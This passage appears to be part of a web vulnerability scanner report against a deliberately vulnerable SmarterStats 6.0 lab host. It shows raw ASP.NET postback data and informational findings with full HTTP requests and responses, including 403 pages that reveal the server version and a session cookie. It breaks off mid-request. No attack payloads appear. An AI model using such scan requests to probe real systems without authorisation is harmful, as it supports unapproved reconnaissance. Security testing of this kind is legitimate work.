QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW03DzLaCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQExvZ1N0YXR1cwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAADExvZ1N0YXR1c1RhYgtkX5dB0MWxfpOHdZB+IBMIEdqpxe094wua6ZwWPljnYkU=|126|asyncPostBackControlIDs||ctl00$BPH$btnSave,,ctl00$BPH$btnEdit,,ctl00$MPH$btnRefresh,,ctl00$BPH$mnu1,,ctl00$MPH$btnUpdateIISImport,,ctl00$BPH$btnDelete,|0|postBackControlIDs|||95|updatePanelIDs||tctl00$UpdatePanel1,,tctl00$TPH$UpdatePanel1,,tctl00$MPH$UpdatePanel5,,tctl00$MPH$UpdatePanel3,|22|childUpdatePanelIDs||ctl00$MPH$UpdatePanel3|67|panelsToRefreshIDs||ctl00$UpdatePanel1,,ctl00$TPH$UpdatePanel1,,ctl00$MPH$UpdatePanel5,|2|asyncPostBackTimeout||90|32|formAction||frmSite.aspx?SiteId=1&popup=true|20|pageTitle||Sites - SmarterStats|224|scriptBlock|ScriptPath|/ScriptResource.axd?d=pVn15ziXvQY5aBffxiDTK6PUkVd1wbLwZ8qHXgDTDQU-gDmeOQZCbCnf3LN8cb6wKZJNHgRyjasDbTS9TuTZ7GXz6UL6zabFuTHuGM9izuBi-gzcVhEZX9Fg6cQx4oJc6iXtzA8ahWISPmTnWBlMNk0W7V9Kl_5HxQNbPSm8qmJcO3ou2wT9aun3Nb592DHA0&t=26c081|198|scriptStartupBlock|ScriptContentNoTags|
function ShowContextMenu_ctl00_MPH_ctl02(evt) {
   $('#ctl00_MPH_ctl02').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}
|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|58|scriptStartupBlock|ScriptContentNoTags|$('#ctl00_MPH_txtAdminNewPassword_SettingText').val('');
|293|scriptStartupBlock|ScriptContentNoTags|
function DelayedSetupctl00_MPH_grdLogLocations() { }
if (self.ctl00_MPH_grdLogLocationsHGIsCallback)
   DelayedSetupctl00_MPH_grdLogLocations();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdLogLocations, 100);});
self.ctl00_MPH_grdLogLocationsHGIsCallback = true;
|278|scriptStartupBlock|ScriptContentNoTags|
function DelayedSetupctl00_MPH_grdLogStatus() { }
if (self.ctl00_MPH_grdLogStatusHGIsCallback)
   DelayedSetupctl00_MPH_grdLogStatus();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdLogStatus, 100);});
self.ctl00_MPH_grdLogStatusHGIsCallback = true;
|278|scriptStartupBlock|ScriptContentNoTags|
function DelayedSetupctl00_MPH_grdSeoStatus() { }
if (self.ctl00_MPH_grdSeoStatusHGIsCallback)
   DelayedSetupctl00_MPH_grdSeoStatus();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdSeoStatus, 100);});
self.ctl00_MPH_grdSeoStatusHGIsCallback = true;
|648|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_LogOptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_LogLocationsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem4":"ctl00_MPH_LogFTPTab","ctl00_TPH_HyperTabStrip1_HyperTabItem5":"ctl00_MPH_SeoOptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem7":"ctl00_MPH_LogStatusTab","ctl00_TPH_HyperTabStrip1_HyperTabItem8":"ctl00_MPH_SEOStatusTab"},"ClientCallbacks":{"onTabChanged":"TabChanged"}}); });
|48|scriptStartupBlock|ScriptContentNoTags|modules['vmNotBlank_txt']='Must have a value';
|141|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Name","vcID":"ctl00_MPH_txtDomainName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
|48|scriptStartupBlock|ScriptContentNoTags|modules['vmOptional_txt']='Value is optional';
|140|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Url","vcID":"ctl00_MPH_txtDomainUrl_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
|156|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Admin Username","vcID":"ctl00_MPH_txtAdminNewUserName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},true);});
|157|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Site Admin Password","vcID":"ctl00_MPH_txtAdminNewPassword_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
|152|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Export Url","vcID":"ctl00_MPH_txtLogFileExportLocURL_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
|171|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Default Documents (one per line)","vcID":"ctl00_MPH_txtDefaultDocuments_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
|573|scriptStartupBlock|ScriptContentNoTags|$(function() { $('#ctl00_MPH_ctl02').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_ctl02_hm0":"__doPostBack(\u0027ctl00$BPH$mnu1\u0027,\u0027ctl00_BPH_mnu1_btnAdd\u0027)","ctl00_MPH_ctl02_hm0_hm0":"__doPostBack(\u0027ctl00$BPH$mnu1\u0027,\u0027ctl00_BPH_mnu1_btnAdd_btnAddLogLocation\u0027)","ctl00_MPH_ctl02_hm1":"__doPostBack(\u0027ctl00$BPH$btnEdit\u0027,\u0027\u0027)","ctl00_MPH_ctl02_hm2":"DoDeleteQuery_ctl00_BPH_btnDelete();"},"ClientCallbacks":{}}); });
|45|scriptStartupBlock|ScriptContentNoTags|modules['vmNumber_txt']='Must be a number';
|58|scriptStartupBlock|ScriptContentNoTags|modules['vmNumberGreater_txt']='Must be {0} or greater';
|202|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Max Keywords","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
|208|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Max Competitors","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
|213|scriptStartupBlock|ScriptContentNoTags|$(function() {$vc({"lt":"Max Position to Retrieve","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
|184|scriptBlock|ScriptPath|/ScriptResource.axd?d=J4GaAPvIQnKMlo_D4Qzm0xa_SfNPfhG-b75huVuGxjWeCTjnztP__eaRa_pbROzW4k2QpoHJQ-uBs4nJPYlOSUcDyDiDF_VzNI93UxMsc1qsbj8BlU_60tzY90-zez8Je4ZNE7PKenoQMyfzxRT0cg2&t=41e66e32|41|focus||ctl00_MPH_txtAdminNewUserName_SettingText|

11.5. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/ButtonBarIcons.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/ButtonBarIcons.xml

Request

GET /App_Themes/Default/ButtonBarIcons.xml HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:10:43 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

11.6. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Skin.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Skin.xml

Request

GET /App_Themes/Default/Skin.xml HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:11:01 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

11.7. http://vulnerable.smarterstats.6.0.host:9999/Client/frmImportSettings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmImportSettings.aspx

Request

POST /Client/frmImportSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmImportSettings.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14882

ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00_MPH_grdImportFilters_HiddenInput=&ctl00%24MPH%24txtDomainUrl_SettingText=555-555-0199@example.com&ctl00%24MPH%24chkStripURL_SettingCheck=on&ctl00_MPH_grdImportFilters_HiddenLSR=&__VIEWSTATE=%2fwEPDwULLTEzNzE4NjgzMDgPFgQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFggCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTseB1Zpc2libGVoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCQ9kFgICAQ9kFgJmD2QWAgIFD2QWBAICD2QWAgIBD2QWBGYPZBYCAgEPZBYCAgIPDxYCHwRlZGQCAQ9kFgICAQ9kFgJmDxBkDxZXZgIBAgICAwIEAgUCBgIHAggCCQIKAgsCDAINAg4CDwIQAhECEgITAhQCFQIWAhcCGAIZAhoCGwIcAh0CHgIfAiACIQIiAiMCJAIlAiYCJwIoAikCKgIrAiwCLQIuAi8CMAIxAjICMwI0AjUCNgI3AjgCOQI6AjsCPAI9Aj4CPwJAAkECQgJDAkQCRQJGAkcCSAJJAkoCSwJMAk0CTgJPAlACUQJSAlMCVAJVAlYWVxAFKChHTVQtMTI6MDApIEludGVybmF0aW9uYWwgRGF0ZSBMaW5lIFdlc3QFATBnEAUgKEdNVC0xMTowMCkgTWlkd2F5IElzbGFuZCwgU2Ftb2EFATFnEAUSKEdNVC0xMDowMCkgSGF3YWlpBQEyZxAFEihHTVQtMDk6MDApIEFsYXNrYQUBM2cQBSQoR01ULTA4OjAwKSBUaWp1YW5hLCBCYWphIENhbGlmb3JuaWEFCy0yMTQ3NDgzNTc5ZxAFJihHTVQtMDg6MDApIFBhY2lmaWMgVGltZSAoVVMgJiBDYW5hZGEpBQE0ZxAFLShHTVQtMDc6MDApIENoaWh1YWh1YSwgTGEgUGF6LCBNYXphdGxhbiAtIE5ldwULLTIxNDc0ODM1ODBnEAUnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpBQIxMGcQBRMoR01ULTA3OjAwKSBBcml6b25hBQIxNWcQBS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBPbGQFAjEzZxAFGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbgUCMjVnEAU1KEdNVC0wNjowMCkgR3VhZGFsYWphcmEsIE1leGljbyBDaXR5LCBNb250ZXJyZXkgLSBPbGQFAjMwZxAFJihHTVQtMDY6MDApIENlbnRyYWwgVGltZSAoVVMgJiBDYW5hZGEpBQIyMGcQBTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldwULLTIxNDc0ODM1ODFnEAUbKEdNVC0wNjowMCkgQ2VudHJhbCBBbWVyaWNhBQIzM2cQBSYoR01ULTA1OjAwKSBFYXN0ZXJuIFRpbWUgKFVTICYgQ2FuYWRhKQUCMzVnEAUaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkFAjQwZxAFKyhHTVQtMDU6MDApIEJvZ290YSwgTGltYSwgUXVpdG8sIFJpbyBCcmFuY28FAjQ1ZxAFEyhHTVQtMDQ6MzApIENhcmFjYXMFCy0yMTQ3NDgzNTczZxAFEihHTVQtMDQ6MDApIE1hbmF1cwULLTIxNDc0ODM1NzZnEAUiKEdNVC0wNDowMCkgQXRsYW50aWMgVGltZSAoQ2FuYWRhKQUCNTBnEAUSKEdNVC0wNDowMCkgTGEgUGF6BQI1NWcQBRQoR01ULTA0OjAwKSBTYW50aWFnbwUCNTZnEAUYKEdNVC0wMzozMCkgTmV3Zm91bmRsYW5kBQI2MGcQBSQoR01ULTAzOjAwKSBCdWVub3MgQWlyZXMsIEdlb3JnZXRvd24FAjcwZxAFFShHTVQtMDM6MDApIEdyZWVubGFuZAUCNzNnEAUUKEdNVC0wMzowMCkgQnJhc2lsaWEFAjY1ZxAFFihHTVQtMDM6MDApIE1vbnRldmlkZW8FCy0yMTQ3NDgzNTc1ZxAFGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYwUCNzVnEAUSKEdNVC0wMTowMCkgQXpvcmVzBQI4MGcQBRooR01ULTAxOjAwKSBDYXBlIFZlcmRlIElzLgUCODNnEAUlKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpawUCOTBnEAU9KEdNVCkgR3JlZW53aWNoIE1lYW4gVGltZSA6IER1YmxpbiwgRWRpbmJ1cmdoLCBMaXNib24sIExvbmRvbgUCODVnEAU9KEdNVCswMTowMCkgQmVsZ3JhZGUsIEJyYXRpc2xhdmEsIEJ1ZGFwZXN0LCBManVibGp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%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBha